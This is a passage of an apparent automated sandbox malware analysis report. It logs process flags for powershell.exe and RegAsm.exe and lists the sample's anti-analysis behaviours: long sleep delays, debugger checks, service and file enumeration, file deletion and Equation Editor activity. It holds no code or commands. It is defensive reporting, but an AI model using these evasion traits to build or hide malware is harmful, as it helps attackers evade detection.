              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F7A7 Sleep,ExitProcess,9_2_0040F7A7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_0041A748
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1081Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1541Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5467Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 675Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 454Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9525Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_9-53364
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3308Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3556Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3624Thread sleep count: 5467 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep count: 675 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3680Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3680Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3680Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3644Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3740Thread sleep count: 454 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3740Thread sleep time: -1362000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3820Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3740Thread sleep count: 9525 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3740Thread sleep time: -28575000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3924Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 4004Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C34D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409253
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C291
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409665
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E879 FindFirstFileExA,9_2_0044E879
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_0040880C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040783C FindFirstFileW,FindNextFileW,9_2_0040783C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419AF5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD37
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_100010F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10006580 FindFirstFileExA,9_2_10006580
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407C97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004349F9
